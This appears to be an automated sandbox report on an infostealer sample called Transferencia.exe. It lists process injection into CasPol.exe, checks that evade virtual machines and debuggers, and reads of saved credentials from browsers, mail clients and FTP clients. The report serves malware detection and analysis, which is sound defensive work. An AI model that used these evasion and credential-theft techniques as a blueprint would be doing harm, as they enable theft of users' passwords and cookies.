Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: Transferencia.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Data Obfuscation

barindex
Source: Yara match File source: 00000009.00000000.100478953847.0000000001350000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.100639341995.0000000002FD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_700D30C0 push eax; ret 2_2_700D30EE
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FE72E7 pushad ; ret 2_2_02FE73B7
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FE84E2 push cs; ret 2_2_02FE84E4
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FEB218 push ds; iretd 2_2_02FEB217
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FEADD8 push ebp; retn 0000h 2_2_02FEADDB
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FEA5A7 push ebx; retf 2_2_02FEA5A8
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FEB181 push ds; iretd 2_2_02FEB217
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FE7306 pushad ; ret 2_2_02FE73B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 9_2_1D8AAD66 push ss; ret 9_2_1D8AAD68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 9_2_20DC1CBC push ds; ret 9_2_20DC1CBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 9_2_20E43638 push ds; ret 9_2_20E43667
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_700D1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 2_2_700D1BFF
Source: C:\Users\user\Desktop\Transferencia.exe File created: C:\Users\user\AppData\Local\Temp\nsj4C7E.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\Transferencia.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\Transferencia.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\Transferencia.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: Transferencia.exe, 00000002.00000002.100639713351.00000000030D1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: Transferencia.exe, 00000002.00000002.100639713351.00000000030D1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL
Source: Transferencia.exe, 00000002.00000002.100638257643.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEP
Source: Transferencia.exe, 00000002.00000002.100638364215.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7292 Thread sleep time: -10145709240540247s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FE9B73 rdtsc 2_2_02FE9B73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window / User API: threadDelayed 9183 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 9_2_1D8A0C40 sldt word ptr [eax] 9_2_1D8A0C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_00406850 FindFirstFileW,FindClose, 2_2_00406850
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_00405C26 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 2_2_00405C26
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_0040290B FindFirstFileW, 2_2_0040290B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Transferencia.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\Transferencia.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Transferencia.exe API call chain: ExitProcess graph end node
Source: Transferencia.exe, 00000002.00000002.100640009548.0000000004A69000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.105233747024.00000000031D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: Transferencia.exe, 00000002.00000002.100640009548.0000000004A69000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.105233747024.00000000031D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: CasPol.exe, 00000009.00000002.105233747024.00000000031D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: Transferencia.exe, 00000002.00000002.100640009548.0000000004A69000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.105233747024.00000000031D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: Transferencia.exe, 00000002.00000002.100640009548.0000000004A69000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.105233747024.00000000031D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: Transferencia.exe, 00000002.00000002.100640009548.0000000004A69000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.105233747024.00000000031D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: CasPol.exe, 00000009.00000002.105233747024.00000000031D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: CasPol.exe, 00000009.00000002.105232196852.000000000154F000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.105232397396.0000000001567000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Transferencia.exe, 00000002.00000002.100639713351.00000000030D1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dll
Source: CasPol.exe, 00000009.00000002.105231609654.0000000001500000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW 4V
Source: Transferencia.exe, 00000002.00000002.100639713351.00000000030D1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: Transferencia.exe, 00000002.00000002.100640009548.0000000004A69000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.105233747024.00000000031D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: Transferencia.exe, 00000002.00000002.100638257643.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exep
Source: Transferencia.exe, 00000002.00000002.100640009548.0000000004A69000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.105233747024.00000000031D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: Transferencia.exe, 00000002.00000002.100640009548.0000000004A69000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.105233747024.00000000031D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: Transferencia.exe, 00000002.00000002.100638364215.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
Source: CasPol.exe, 00000009.00000002.105233747024.00000000031D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_700D1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 2_2_700D1BFF
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FE9B73 rdtsc 2_2_02FE9B73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FF5AD4 mov eax, dword ptr fs:[00000030h] 2_2_02FF5AD4
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FED271 mov eax, dword ptr fs:[00000030h] 2_2_02FED271
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FF45CB mov eax, dword ptr fs:[00000030h] 2_2_02FF45CB
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FED1B7 mov eax, dword ptr fs:[00000030h] 2_2_02FED1B7
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FED1B4 mov eax, dword ptr fs:[00000030h] 2_2_02FED1B4
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FF0743 mov eax, dword ptr fs:[00000030h] 2_2_02FF0743
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_02FECB01 mov eax, dword ptr fs:[00000030h] 2_2_02FECB01
Source: C:\Users\user\Desktop\Transferencia.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\Transferencia.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 1350000 Jump to behavior
Source: C:\Users\user\Desktop\Transferencia.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Transferencia.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\Transferencia.exe Code function: 2_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 2_2_0040350A

Stealing of Sensitive Information

barindex
Source: Yara match File source: 00000009.00000002.105254901197.000000001DAF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 4560, type: MEMORYSTR
Source: Yara match File source: 00000009.00000002.105254901197.000000001DAF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 4560, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: Yara match File source: 00000009.00000002.105254901197.000000001DAF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 4560, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: 00000009.00000002.105254901197.000000001DAF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 4560, type: MEMORYSTR
Source: Yara match File source: 00000009.00000002.105254901197.000000001DAF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
